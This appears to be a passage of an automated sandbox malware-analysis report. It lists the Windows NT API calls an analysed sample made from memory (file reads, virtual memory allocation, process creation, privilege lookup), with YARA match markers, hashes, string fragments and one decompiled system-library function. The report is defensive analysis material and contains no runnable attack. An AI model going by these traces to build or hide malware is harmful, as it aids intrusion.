                          • Instruction ID: f41519945518ab3bb34ca3868135f217c9888e37ad5620f400a95dc3c3dbb446
                          • Opcode Fuzzy Hash: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                          • Instruction Fuzzy Hash: 5CF0B6B220514AABCB08DF98DD85CDBB7ADBF8C254B05864DFA5D93201D630E8518BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,01114B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01114B77,007A002E,00000000,00000060,00000000,00000000), ref: 01119D9D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                          • Instruction ID: 7217eea88e7ae42794a0f556a3e403d328c7f43fdd383a844c5c227652499dcb
                          • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                          • Instruction Fuzzy Hash: 51F0BCB2204009AF8B08CF88D890CEB73F9BF8C308B118608FA4D93201C630E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtReadFile.NTDLL(01114D32,5EB6522D,FFFFFFFF,011149F1,?,?,01114D32,?,011149F1,FFFFFFFF,5EB6522D,01114D32,?,00000000), ref: 01119E45
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction ID: 80f3d3a4fd755cc37fefb65e72663d88ca426d90c729a737a25909e99e77db8c
                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction Fuzzy Hash: 41F017B2200208AFCB08DF89DC80EEB77ADEF8C714F018248BE1D97240D630E811CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtReadFile.NTDLL(01114D32,5EB6522D,FFFFFFFF,011149F1,?,?,01114D32,?,011149F1,FFFFFFFF,5EB6522D,01114D32,?,00000000), ref: 01119E45
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                          • Instruction ID: 44a78a00dc6e2e49b1bb4b35af3f367e1bb0085cf5abae8ca833b1b407c5001d
                          • Opcode Fuzzy Hash: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                          • Instruction Fuzzy Hash: 54F0A9B6200109AFCB14DF89DC90DEB77A9AF8C354F168649BA5DA7250D630E8518BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01102D11,00002000,00003000,00000004), ref: 01119F69
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                          • Instruction ID: ff97003ffad565e3251666f9b9e49561754a8c450f5b04c6e85d63d9cec63d6a
                          • Opcode Fuzzy Hash: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                          • Instruction Fuzzy Hash: F0F058B2210218AFCB18DF88DC91EEB77ADAF88210F158219FA1C97240D630E910CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01102D11,00002000,00003000,00000004), ref: 01119F69
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                          • Instruction ID: e3b220a255645e34c3b7dc64ac04f6bd7c5960cd24f7c6fd65b8bf4237a3a924
                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                          • Instruction Fuzzy Hash: ADF015B6200209AFCB18DF89DC81EAB77ADAF88654F118159BE5897241C630F810CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtClose.NTDLL(01114D10,?,?,01114D10,00000000,FFFFFFFF), ref: 01119EA5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                          • Instruction ID: d99dc521551ce44f72c482a0b8584fa670413170cb2de95f03477afd2c5f5ba5
                          • Opcode Fuzzy Hash: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                          • Instruction Fuzzy Hash: EAE0C235200108AFD714EFA8CC89FE7BB69EF48360F0641AAFA5C9B241D631F650C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtClose.NTDLL(01114D10,?,?,01114D10,00000000,FFFFFFFF), ref: 01119EA5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction ID: 3347a71d538934e9e7c0972bb61819734bec4f855e42999d5b807cf34c2af793
                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction Fuzzy Hash: 1ED012752002146BD714EB98DC45E977B5DEF44660F154455BA5C5B241D530F50086E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 277c24a3ae76205babb39866eadc79d176fc80445e25a2e12855662ff1d29a37
                          • Instruction ID: bbcd566270ae5a36165f943b3c102fc93d555112d733ac7808b5a46bbf4404f5
                          • Opcode Fuzzy Hash: 277c24a3ae76205babb39866eadc79d176fc80445e25a2e12855662ff1d29a37
                          • Instruction Fuzzy Hash: 67900265211010030105A5595744507005697D53A13A1C425F5046550CD76588726161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9cfd50445cc1073e38d8b6d516dc1b2669f5b0286eaabe0ca66be6f5a82c2469
                          • Instruction ID: 88911117d436cd714a8dba63b2ae5db51d07a616a5de9ac856458c58fcc2391e
                          • Opcode Fuzzy Hash: 9cfd50445cc1073e38d8b6d516dc1b2669f5b0286eaabe0ca66be6f5a82c2469
                          • Instruction Fuzzy Hash: B69002A120201003410571599554616401A97E0251BA1C425E5045590DC66988B27165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a6f0f07a2dc3abd482b861b9ddcee352f925f905204003cadf6fc82443a7da2e
                          • Instruction ID: d996a2f8ac9936d924da2ee93eb3079b32f6c1ec7c82361af0d9782efb43a725
                          • Opcode Fuzzy Hash: a6f0f07a2dc3abd482b861b9ddcee352f925f905204003cadf6fc82443a7da2e
                          • Instruction Fuzzy Hash: 3C90027131115402D1106159D544706001597D1251FA1C815A4855558D87D988B27162
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: eb503d4eecd981301e3ec677a4c314a8a72bc8b052d55960edac99bd32be9ca8
                          • Instruction ID: 7e5237235e28ff490010bbf039c42fc8ca85c9ad7b3dddb19315fe3474672ef1
                          • Opcode Fuzzy Hash: eb503d4eecd981301e3ec677a4c314a8a72bc8b052d55960edac99bd32be9ca8
                          • Instruction Fuzzy Hash: C190027120101802D1807159954464A001597D1351FE1C419A4056654DCB598A7A77E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f2ddcfa9f10482cce65deef864f17b114ff95710a91816ff10871b7919261d57
                          • Instruction ID: 4aba79cbebfd857e7bd31faf1c48bfdbf109c9ecd989239088161b693524f06e
                          • Opcode Fuzzy Hash: f2ddcfa9f10482cce65deef864f17b114ff95710a91816ff10871b7919261d57
                          • Instruction Fuzzy Hash: F390027120109802D1106159D54474A001597D0351FA5C815A8455658D87D988B27161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: aff5ad1b06e49bc6b240e04325d3f83bc1a161d79be7263a7c59fc96ca3b9a7f
                          • Instruction ID: 58c5e760464fe095f098d93c5af7571e569acef412831fc42567186e5319c6cd
                          • Opcode Fuzzy Hash: aff5ad1b06e49bc6b240e04325d3f83bc1a161d79be7263a7c59fc96ca3b9a7f
                          • Instruction Fuzzy Hash: 9C9002B120101402D14071599544746001597D0351FA1C415A9095554E879D8DF676A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 47d337e2a5ada1398d80c8fc2e186e0dda09a842cb55e6f6174e4da257e0fb1f
                          • Instruction ID: e79d497553d0e28d6e91e90be2935fcb506812286e352f37dc1f034e1e40dcfe
                          • Opcode Fuzzy Hash: 47d337e2a5ada1398d80c8fc2e186e0dda09a842cb55e6f6174e4da257e0fb1f
                          • Instruction Fuzzy Hash: 5E90027120101413D11161599644707001997D0291FE1C816A4455558D979A8973B161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 5f94002a8f07986864f21debde665e3b46c435d97b1f1d751d62f5966365f971
                          • Instruction ID: 9969846dc318712bd867f165d4c9aec9d888d34bf1c61a97c6dd05b92730539b
                          • Opcode Fuzzy Hash: 5f94002a8f07986864f21debde665e3b46c435d97b1f1d751d62f5966365f971
                          • Instruction Fuzzy Hash: AB90026121181042D20065699D54B07001597D0353FA1C519A4185554CCA5988726561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01103AF8), ref: 0111A08D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                          • Instruction ID: b961b236c864e9db217d0e5897c75100b8276ff7a594aa3ada5b10961eed270b
                          • Opcode Fuzzy Hash: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                          • Instruction Fuzzy Hash: D5E068B80003864FDB04EE38D4D14673B85EF802207008A8ADC9943202C120C81987A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01103AF8), ref: 0111A08D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction ID: 2a8386d6140cda5c99d390154a1da034149f62ee04be6bdf84290916c1cb6ffa
                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction Fuzzy Hash: E8E012B5200209ABDB18EF99DC49EA777ADAF88660F018559BA585B241D630E9108AB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0111A124
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction ID: f2e216fd32879efb6381e37faba715e3f2a091e0856d03cd56287404c5727d67
                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction Fuzzy Hash: 5D01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA4D97240D630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0110F192,0110F192,?,00000000,?,?), ref: 0111A1F0
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction ID: 3262446e0ead47c6974b36210042029cae56b8c88df654cfd8c3eab28a92c276
                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction Fuzzy Hash: 64E01AB52002086BDB14DF49DC85EE777ADAF88650F018165BA4C57241DA30E8108BF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(011144F6,?,01114C6F,01114C6F,?,011144F6,?,?,?,?,?,00000000,00000000,?), ref: 0111A04D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                          • Instruction ID: 011df9eb4c85469efcbd5cc15ef5a1e1f07bca90adffb4dbd32e68aefb3c71df
                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                          • Instruction Fuzzy Hash: B4E012B5200208ABDB18EF99DC41EA777ADAF88664F118559BA585B241C630F9108AB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6d73d66f77fbb60e1817ec8fbd3166ac7660ef8481fbd5779595a4efe0af1e4c
                          • Instruction ID: 5680a3f7a9868f2d395f82bd54acf89f62043df59c78b2e8475889b4dca70bdc
                          • Opcode Fuzzy Hash: 6d73d66f77fbb60e1817ec8fbd3166ac7660ef8481fbd5779595a4efe0af1e4c
                          • Instruction Fuzzy Hash: 6CB02BB18010C0C5D600D3604708B27390077C0300F22C061D2020640A033CC0A1F1B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Us$: $er-A$gent$urlmon.dll
                          • API String ID: 0-1367105278
                          • Opcode ID: 322ff36b181f73603f449628b60f3b565e0af28169e45aa51266f965256259f0
                          • Instruction ID: 69d559396695928a5b3143cf9da36f3bc9a0a3ea06cf2dd99cdfab7598fc3310
                          • Opcode Fuzzy Hash: 322ff36b181f73603f449628b60f3b565e0af28169e45aa51266f965256259f0
                          • Instruction Fuzzy Hash: 38118C72E0521A56EB159F94EC02BFEFB74EF51714F140165EC086B388D379990287DA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                          • Instruction ID: ea0d7bc5f4d0d99ffa8c56509fe9ee83083abdf3bc359906aa36301fcef11da0
                          • Opcode Fuzzy Hash: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                          • Instruction Fuzzy Hash: 98E06836E4A1508A6B19ADADB4050EAFF20E99B06476432A6CC0C6B34AC622D811CAC6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E0516FDDA(intOrPtr* __edx, intOrPtr _a4) {
                          				void* _t7;
                          				intOrPtr _t9;
                          				intOrPtr _t10;
                          				intOrPtr* _t12;
                          				intOrPtr* _t13;
                          				intOrPtr _t14;
                          				intOrPtr* _t15;
                          
                          				_t13 = __edx;
                          				_push(_a4);
                          				_t14 =  *[fs:0x18];
                          				_t15 = _t12;
                          				_t7 = E0511CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                          				_push(_t13);
                          				E05165720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                          				_t9 =  *_t15;
                          				if(_t9 == 0xffffffff) {
                          					_t10 = 0;
                          				} else {
                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                          				}
                          				_push(_t10);
                          				_push(_t15);
                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                          				return E05165720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                          			}











                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0516FDFA
                          Strings
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0516FE2B
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0516FE01
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: bac6bce8fd681173f0631035ac24ffbe765c2f7702ca13f0ebbbfc3a3a4a79ca
                          • Instruction ID: 352cf94694365940238fc19c82bf03232e4cef00eded22cebe0832e0afc8dfd6
                          • Opcode Fuzzy Hash: bac6bce8fd681173f0631035ac24ffbe765c2f7702ca13f0ebbbfc3a3a4a79ca
                          • Instruction Fuzzy Hash: 36F04636240201BFD6201A45EC06F27BF5BEB40730F154314F6284A5D1DB62F87092F4
                          Uniqueness

                          Uniqueness Score: -1.00%